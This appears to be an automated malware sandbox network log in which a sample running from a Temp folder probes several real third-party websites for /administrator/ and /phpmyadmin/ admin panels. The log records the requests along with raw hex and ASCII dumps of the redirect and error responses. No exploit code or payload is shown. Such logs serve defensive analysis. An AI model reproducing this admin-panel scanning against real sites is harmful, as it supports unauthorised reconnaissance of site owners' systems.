                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                78192.168.2.45453189.161.228.119805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.938055992 CET172OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: preda.pl
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.212768078 CET780INHTTP/1.1 301 Moved
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 579
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://preda.pl/administrator/
                                                                                                                                                                                                                                                                                                                                Server: IdeaWebServer/5.4.0
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 33 30 31 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 33 30 31 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 4d 6f 76 65 64 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 70 72 65 64 61 2e 70 6c 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 301</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>301</h1></div><div class="error-text"><h1>Moved</h1></div></div><div class="error-descr-container"><p>The document has moved <A HREF="https://preda.pl/administrator/">here</A>.</p></div> </body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                79192.168.2.45467189.46.109.48805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.313466072 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predan.it
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.568473101 CET418INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: aruba-proxy
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 168
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Location: https://www.predan.it/administrator/
                                                                                                                                                                                                                                                                                                                                X-ServerName: ipvsproxy189.ad.aruba.it
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                80192.168.2.454630193.163.77.6805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.406363010 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.457597971 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=bdmjpgckhs0bhq2001gh1oo7d2; path=/
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                content-length: 19246
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:30 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c7 47 86 dc 27 e6 a7 85 42 e3 e7 94 25 2f 42 67 3a 65 e1 37 0b e6 3f 84 41 9c 43 b1 38 4c 58 b1 a4
                                                                                                                                                                                                                                                                                                                                Data Ascii: IG |&?xAVV#5""Th"fS b}>Ti:lt>L<4%{%vt*&{{+^-{v!.[uv6!fgoEXL5a$'X0`Mk#x;c13{xM;VcJzcAlYW`X$?O0r\?}y]* #/'@~eQLl08u0{X}-xFdQ7wbiQE2St\@A=:eK>+`Y&[8&woEcOaa}T9h]TQ6M9nXITs-P887<iON'Imak?tL>jm6oYNMqlI37nusRC6'1{3aQ0<WlWkFNy]M~ow;iQ,v {vgF^,X>Lqp>=kRB#"S7^,13EG .EPqW_;BnKafVKsqR?c-j7O'GRAQ&1`[R!KG'B%/Bg:e7?AC8LX
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.457648993 CET1286INData Raw: 80 74 4e 5f eb 73 b1 de 28 f0 47 a8 37 59 38 c2 d2 50 b0 5d 2a 15 04 73 87 45 1c cc 28 09 5d 28 21 87 e6 cf c7 7f 2e d0 ed cf c7 5e 60 27 40 df 3f 1f 47 33 ea 78 a3 b4 2a 4b aa 29 1c de d1 62 b6 68 e9 d1 39 f6 68 9a c0 9c 02 74 9d de b0 df 1e 76
                                                                                                                                                                                                                                                                                                                                Data Ascii: tN_s(G7Y8P]*sE(](!.^`'@?G3x*K)bh9htvlo4['yR]8X,`4hZTaB(Zu"*XqiAL7uWrAz"pM RNkIN otj}/r{[?d0G<q
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.457879066 CET1286INData Raw: ad cb eb 8d 3e af 6b c8 ba 29 a8 49 80 f6 f7 f5 06 27 6f c9 36 82 a6 85 69 86 0b 8c d3 24 dc d6 eb 2d cd 96 75 53 50 91 eb 2c b6 00 b2 83 71 18 2c 1c 3e 93 8b d6 c8 e6 7e a2 68 9a 53 43 98 80 c0 79 68 fd 51 5e 3f 8a d0 fa da da 57 1f 48 64 cc 58
                                                                                                                                                                                                                                                                                                                                Data Ascii: >k)I'o6i$-uSP,q,>~hSCyhQ^?WHdX<eXFZUz!r;H 4a[9c>*vd50noKM9rw.l[+!*TBnv l"kkUof3Rg(TE>H
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.457984924 CET1286INData Raw: cb 1a a5 86 40 cb ec 63 99 24 62 95 ba 29 11 c5 bc 12 3c 2c 7a 34 e0 51 84 b1 c7 bc 24 ca b7 cd c8 55 f6 34 d9 ca d2 10 48 a6 d0 1d 7f c1 3d 6f ce 34 5c 4c 2c 59 88 31 6c 77 34 71 62 95 c9 3d 0c ff e4 dd 28 a4 a1 75 c1 64 c6 38 59 8d 7c 1e 1f 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: @c$b)<,z4Q$U4H=o4\L,Y1lw4qb=(ud8Y|lsb!_R#i12uX,wVy|[3I|?<z(<N>|W>{EA?$"(b1?'w&co Fv'I|y?=O?.Dm"~SP/n@+;sh:Jvm
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.458062887 CET1286INData Raw: 09 3b 78 75 97 3b 3f 9f 92 4a 4a 85 64 24 6b 41 79 60 81 41 18 8d d2 40 ef a8 63 7e b7 a0 36 9e de 31 e2 60 01 1e 8c 9c 94 1b ca 64 8e 8e ae 58 77 0f 50 dd ed a0 98 cb 30 68 32 ea 74 c8 11 4f c0 4d de 23 9c c0 5c 1e 8c 3a a3 9e 92 f1 1d 9e fe 33
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;xu;?JJd$kAy`A@c~61`dXwP0h2tOM#\:3p%{):umw#0^M!z%<w{JSg/&j_&n&~Lpvmec1~pbe}f}!jV&i?&g/&j_&n&~Lpvme2Aj:
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.458103895 CET1286INData Raw: bc b3 6c 47 96 e5 9d 33 ae 89 40 ce 11 43 3a a3 fb 23 e3 6c 93 56 2b f4 57 5d 33 f3 f1 e2 4d b7 58 a2 a3 dd 4a 95 65 2a 3b b8 b8 c1 dc e9 f7 ef 98 dd 13 30 9a cd 4f ae 59 76 73 6f 3a d7 20 73 a7 d4 73 c5 74 92 1d f9 fc f3 93 07 ed 6c f2 4b 0b a9
                                                                                                                                                                                                                                                                                                                                Data Ascii: lG3@C:#lV+W]3MXJe*;0OYvso: sstlKWnx'_wtL!ZfsWf`w3=Tf<slax=1}B;2MbL@2Ii1^EDQzs uwLlsWnz)eZw`0A$]D2Q
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.458175898 CET860INData Raw: f9 70 42 c5 0b db 70 31 01 51 2e 26 20 3c 9e 23 68 74 1e 19 62 eb ba 31 09 ac 24 22 1b ee 2f 10 6e 0e 1f 26 b5 95 b8 51 3a 1f 79 40 96 52 92 54 ef 54 40 54 dc 0c 12 98 d2 ae 45 59 8f 5a 04 5c 68 8b cd 02 1c c9 fb ad 2f df be c1 f7 dd d6 bf a4 77
                                                                                                                                                                                                                                                                                                                                Data Ascii: pBp1Q.& <#htb1$"/n&Q:y@RTT@TEYZ\h/w*m7kHjH5N\!7#mo8cZz^ddLTYLycb[;FB{#_(/If"E&O3=RaZ!
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.458365917 CET1286INData Raw: ce 79 b2 40 63 55 f2 2f be 08 bc 08 d7 97 17 b6 9f 59 1c 05 70 32 64 5b fe b7 32 bd 75 9a 76 a3 6f bb 35 9a 54 fd 41 8a d1 20 10 ee b7 f8 6a c6 b1 60 39 b1 b4 21 ed 23 be 52 52 72 36 aa e7 21 52 45 29 97 54 b0 3c c5 b9 27 c2 e5 85 a7 81 b9 06 de
                                                                                                                                                                                                                                                                                                                                Data Ascii: y@cU/Yp2d[2uvo5TA j`9!#RRr6!RE)T<'J(WqIII^L5:{kIlXu:[0t~DH_[FMy3N:q=nrp10*F{ByeNW,0!zb*t
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.458478928 CET1286INData Raw: f6 cf ed 5e f7 98 f4 fb 9d 76 db 6c 73 9e 13 45 1e 3f 79 f0 d5 ef ef 4a f3 cf a7 ff 4d 9d 79 4a b1 07 8f be 7d fc fc c1 5d f2 e5 d2 61 17 76 10 b9 20 82 97 3c d2 e2 1d 91 4e db bc 43 da 9d 53 d2 36 c9 53 48 61 30 13 96 81 52 fb 9b 17 2f d7 ff cf
                                                                                                                                                                                                                                                                                                                                Data Ascii: ^vlsE?yJMyJ}]av <NCS6SHa0R/~|Y 62wj<1h]PSh8sVA+L:Ns^[Ya<A{VQS`^fjHUJGhmkEx0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.709933996 CET1286INData Raw: f7 4f 61 f2 fa 12 d2 c9 52 dd 32 73 83 64 2a a1 68 36 a9 7a 9d 8e 32 01 d1 c3 8b f5 13 10 b2 d6 3f c7 b5 4f c0 14 4d b3 a9 d6 1d 9e 1a 0b 36 a7 16 ee b1 5d b8 0c 9a 9f 9b 09 6c be be 04 7b 07 ac 9d 34 a7 06 83 a1 8c 64 3b bd c4 7a f2 2d fd 47 21
                                                                                                                                                                                                                                                                                                                                Data Ascii: OaR2sd*h6z2?OM6]l{4d;z-G!CuE\:U1*!kD^4aquL[4Kit$`ze@lRHq#rhLCG}!~<8S8IKLi%!zSQ7BqGJs
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.710021019 CET1286INData Raw: 7d d3 58 ae 22 5a f4 2b 56 11 ae 95 ed e5 48 64 45 0f 9e 43 4d 11 e9 3e be e1 e4 d2 19 b7 7f cb 43 f5 4c 66 a1 61 a0 1d b5 1b f3 d9 75 88 9a ad 12 4e 07 46 98 e0 c1 e1 0a d5 be 4d c4 61 de 7a 49 56 c5 d2 70 7a 9d 18 f1 ca d2 b2 d9 8b 15 4a d3 da
                                                                                                                                                                                                                                                                                                                                Data Ascii: }X"Z+VHdECM>CLfauNFMazIVpzJ)Alad7OS3!0K[_;PStZc%s^b@HQ^yw9w^WP],]/Z$y+bWN
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:30.711071014 CET276OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                Cookie: PHPSESSID=bdmjpgckhs0bhq2001gh1oo7d2
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://janckulik.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:31.769192934 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                content-length: 19249
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 49 93 1b 47 96 20 7c 26 cd e6 3f 78 41 56 56 92 0d 23 13 81 35 93 22 b3 86 22 a9 a5 54 a4 68 22 8b 66 53 8b c1 1c 11 0e 20 12 b1 a0 62 01 89 d4 e8 f0 7d a7 3e 54 cd dc e7 d4 69 d6 3a c8 6c 74 aa 3e c9 4c 3c 34 98 7f e4 fb 25 df 7b ee 1e 11 1e 11 8e 25 c9 0c 76 74 0f a0 2a 26 e0 cb 7b ee cf 9f bf cd b7 7b bf b2 03 2b 5e 2d 18 99 c5 9e 7b 76 fb 1e fe 21 2e f5 a7 f7 5b d1 bc 75 76 fb 36 21 f7 66 8c da 67 b7 6f dd be 45 08 fe f4 58 4c 89 35 a3 61 c4 e2 fb ad 24 9e 18 27 58 30 cb 9a c5 f1 c2 60 7f 4d 9c e5 fd d6 6b 23 a1 86 15 78 0b 1a 3b 63 97 b5 88 15 f8 31 f3 a1 9e c3 ee 33 7b ca 78 4d ac 1a 3b b1 cb ce 1e ce 56 63 4a 7a ed de bd 63 91 90 41 f5 a9 c7 ee b7 6c 16 59 a1 b3 88 9d c0 57 60 bd 58 ff 1c 07 24 8a c3 f5 a5 3f 4f 88 ef 30 72 ce 88 17 5c bd f1 d7 3f 12 7f 7d 79 1e 5d fd d0 2a c3 9a b3 d5 ab 20 b4 23 05 10 2f 83 1f f9 27 ff 40 c2 ed db f7 7e 65 18 51 4c c6 6c ea f8 c4 30 38 75 8a 30 97 0e 7b b5 08 c2 58 81 f9 ca b1 e3 d9 7d 9b 2d 1d 8b 19 fc c7 1d e2 d1 d7 8e 97 78 46 64 51 97 dd 37 ef 10 c7 77 62 87 ba 69 c2 51 bb 45 8e cf 32 84 cc b7 53 74 f7 5c c7 9f 93 90 b9 40 41 0b 89 80 83 07 df 3d 3a 65 c7 4b df 3e f2 1c 2b 0c a2 60 12 1f 89 fc 59 c8 26 f7 5b 38 26 77 8f 8f cf a9 6f cd 13 d7 99 1f 45 f3 63 c7 9b 1e 4f e8 12 8b 61 d9 df 9a 83 61 bb 7d da eb f7 bb 82 54 39 a6 68 06 5d b2 92 98 54 51 be 36 de 17 4d 99 a6 9c a4 39 6e ba 58 b8 cc 88 83 c4 9a 49 54 91 73 c1 a2 fb 2d f3 a4 fd 1a fe af a2 8e ca b8 93 85 1b 50 fb 38 8a e3 19 f3 18 b3 9d 38 08 8f cd c1 a4 37 3c 69 4f 4e c6 27 c3 49 a7 6d b3 61 af d7 6b b7 c7 ed ee d8 1a b7 fb dd a3 85 3f e5 ad ec 74 fa d0 4c 3e 12 82 09 b6 12 1f 6a e5 6d 1b bc 36 07 d7 6f 59 ff 94 0d ed 4e bf 4d db bd 93 71 d7 6c 0f 06 e3 81 d5 ef 9c 9c f6 e9 49 a7 33 a4 37 d0 b2 6e e7 75 b7 73 fd 96 9d 52 cb ec 98 43 eb 04 e8 36 1c 8e 27 9d 31 9d c0 bf d0 b6 ce c4 1c f7 db 7b b5 cc a3 be 33 61 51 9c a2 df 30 3c c7 91 13 b3 a3 57 6c 9c 96 57 01 6b c1 46 f3 0a 17 ee d7 ad 4e 9f b1 93 b1 79 02 5d ea 9f 8e d9 90 4d c6 e3 7e af d7 6f 77 3b 96 69 d1 fe 51 b4 2c 76 cb 0a dc 20 bc df fa 88 f5 7b 76 67 90 b7 46 11 01 5e 84 2c eb 58 14 85 14 c8 3e 7f e2 4c 15 71 70 0d 3e 3d 1e 87 c1 ab 88 85 02 c6 d1 6b cf ad 52 42 23 22 8a 53 37 5e b9 2c 9a 31 16 97 a9 33 81 16 45 47 d3 20 98 ba 8c 2e 9c e8 08 c4 f4 b1 15 45 bf 9d 50 cf 71 57 f7 5f 06 ae 3b 0f 42 ff 6e c8 a6 89 4b c3 16 f1 a0 61 14 66 a4 eb 56 04 84 16 4b b9 97 bc 73 d1 71 1c 52 3f 9a 04 a1 c7 c2 63 1a 81 12 89 8e 2d 6a cd 98 c8 37 ba d4 b6 4f 27 c0 fc 47 d0 98 12 52 f1 41 51 0c e8 85 26 90 9c 1e b3 d7 31 60 5b 52 91 9a 8d 0c 21 4b 1a 12 00 19 07 16 0d e3 11 b0 94 c7 47 86 dc 27 e6 a7 85 42 e3 e7 94 25 2f 42 67 3a 65 e1 37 0b e6 3f 84 41 9c 43 b1 38 4c 58 b1 a4 80 74 4e 5f eb 73 b1 de 28 f0 47 a8 37 59 38 c2 d2 50 b0 5d 2a 15 04 73 87 45 1c cc 28 09 5d 28 21 87 e6 cf c7 7f 2e d0 ed cf c7 5e 60 27 40 df 3f 1f 47 33 ea 78 a3 b4 2a 4b
                                                                                                                                                                                                                                                                                                                                Data Ascii: IG |&?xAVV#5""Th"fS b}>Ti:lt>L<4%{%vt*&{{+^-{v!.[uv6!fgoEXL5a$'X0`Mk#x;c13{xM;VcJzcAlYW`X$?O0r\?}y]* #/'@~eQLl08u0{X}-xFdQ7wbiQE2St\@A=:eK>+`Y&[8&woEcOaa}T9h]TQ6M9nXITs-P887<iON'Imak?tL>jm6oYNMqlI37nusRC6'1{3aQ0<WlWkFNy]M~ow;iQ,v {vgF^,X>Lqp>=kRB#"S7^,13EG .EPqW_;BnKafVKsqR?c-j7O'GRAQ&1`[R!KG'B%/Bg:e7?AC8LXtN_s(G7Y8P]*sE(](!.^`'@?G3x*K


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                81192.168.2.454791162.43.104.145805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.064800978 CET172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.452109098 CET331INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                                                                                                                                                                                                Location: https://nakacho.com/phpmyadmin/


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                82192.168.2.45477959.106.13.82805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
